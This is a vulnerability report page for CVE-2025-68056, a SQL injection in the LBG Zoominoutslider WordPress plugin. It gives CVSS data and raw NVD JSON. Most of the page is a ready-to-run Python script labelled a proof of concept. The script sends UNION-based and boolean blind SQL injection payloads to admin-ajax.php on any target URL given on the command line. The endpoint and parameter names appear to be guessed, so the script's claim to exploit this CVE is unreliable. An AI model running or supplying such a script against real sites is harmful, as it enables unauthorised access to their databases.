Security Vulnerability Report
中文
CVE-2025-68056 CVSS 8.5 HIGH

CVE-2025-68056

Published: 2025-12-16 09:16:01
Last Modified: 2026-04-27 19:16:24

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in LambertGroup LBG Zoominoutslider lbg_zoominoutslider allows SQL Injection.This issue affects LBG Zoominoutslider: from n/a through <= 5.4.4.

CVSS Details

CVSS Score
8.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L

Configurations (Affected Products)

No configuration data available.

LBG Zoominoutslider <= 5.4.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-68056 SQL Injection PoC for LBG Zoominoutslider WordPress Plugin # Affected Version: <= 5.4.4 # CVSS Score: 8.5 (High) import requests import sys def exploit_sqli(target_url, param_name='id'): """ SQL Injection PoC for LBG Zoominoutslider plugin This demonstrates extracting database version information """ # Target endpoint - typically ajax handler or shortcode processing target = f"{target_url}/wp-admin/admin-ajax.php" # SQL Injection payload to extract database version # Using UNION-based injection technique payload = f"1 UNION SELECT 1,2,3,4,5,@@version,7,8,9,10--" # Construct the request params = { 'action': 'lbg_zoominoutslider_ajax', param_name: payload } headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'Content-Type': 'application/x-www-form-urlencoded' } try: print(f"[*] Target: {target}") print(f"[*] Payload: {payload}") response = requests.post(target, data=params, headers=headers, timeout=10) if response.status_code == 200: print(f"[+] Request sent successfully") print(f"[+] Response length: {len(response.text)}") # Check for database version in response if '5.7' in response.text or '8.0' in response.text or 'MariaDB' in response.text: print("[!] SQL Injection confirmed - Database version leaked") return True else: print("[*] No obvious version leak, try manual inspection") return False else: print(f"[-] Request failed with status: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False def blind_sqli_check(target_url): """ Boolean-based blind SQL injection check """ target = f"{target_url}/wp-admin/admin-ajax.php" # True condition - should return normal response true_payload = "1 AND 1=1" # False condition - should return different response false_payload = "1 AND 1=2" params_true = {'action': 'lbg_zoominoutslider_ajax', 'id': true_payload} params_false = {'action': 'lbg_zoominoutslider_ajax', 'id': false_payload} try: resp_true = requests.post(target, data=params_true, timeout=10) resp_false = requests.post(target, data=params_false, timeout=10) if resp_true.text != resp_false.text: print("[!] Blind SQL Injection vulnerability confirmed!") print(f"[+] True response length: {len(resp_true.text)}") print(f"[+] False response length: {len(resp_false.text)}") return True else: print("[-] No difference detected - may not be vulnerable") return False except Exception as e: print(f"[-] Error during blind SQL check: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-68056.py <target_url>") print("Example: python cve-2025-68056.py https://example.com") sys.exit(1) target = sys.argv[1].rstrip('/') print("=" * 60) print("CVE-2025-68056 SQL Injection PoC") print("Target: LBG Zoominoutslider WordPress Plugin <= 5.4.4") print("=" * 60) # Run vulnerability checks exploit_sqli(target) print("-" * 60) blind_sqli_check(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68056", "sourceIdentifier": "[email protected]", "published": "2025-12-16T09:16:01.347", "lastModified": "2026-04-27T19:16:23.793", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in LambertGroup LBG Zoominoutslider lbg_zoominoutslider allows SQL Injection.This issue affects LBG Zoominoutslider: from n/a through <= 5.4.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/lbg_zoominoutslider/vulnerability/wordpress-lbg-zoominoutslider-plugin-5-4-5-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}